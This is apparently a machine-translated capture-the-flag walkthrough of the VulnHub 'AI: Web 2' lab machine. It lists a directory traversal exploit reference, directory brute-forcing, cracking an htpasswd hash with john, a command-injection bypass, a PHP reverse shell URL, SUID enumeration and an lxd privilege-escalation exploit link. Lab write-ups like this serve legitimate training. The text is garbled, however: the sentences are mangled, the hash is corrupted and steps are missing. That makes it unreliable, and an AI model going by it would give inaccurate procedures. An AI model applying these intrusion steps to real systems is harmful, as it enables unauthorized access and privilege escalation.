Drone Download link:
https://www.vulnhub.com/entry/ai-web-2,357
Host port scan:
SQL injection attempts, found no injection vulnerability, register to create an account in a
http://10.10.202.160/userpage.php
Under vulnerability database search:
XuezhuLi FileSharing - Directory Traversal
https://www.exploit-db.com/exploits/40009
We look at blasting directory
╰─ sudo -u python3 dirsearch.py http://10.10.202.160/ -e .php
We tried certification file that contains the Apache look at
aiweb2admin: apr1 $ $ $ VXqmVvDD otU1gx4nwCgsAOA7Wi.aU /
╰─ john --wordlist=/usr/share/wordlists/rockyou.txt htpwd
aiweb2admin: c.ronaldo
After attempts &&; | find | command execution can be bypassed
Visit: http: //10.10.202.160/webadmin/H05Tpin9555/php-reverse.php
Then mention the right to carry out the operation:
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
n0nr00tuser@aiweb2host:/tmp$ ./LinEnum.sh
╰─ searchsploit lxd
Creating hack.sh file, copy the following link script content to hack.sh
https://www.exploit-db.com/exploits/46978
OVER !!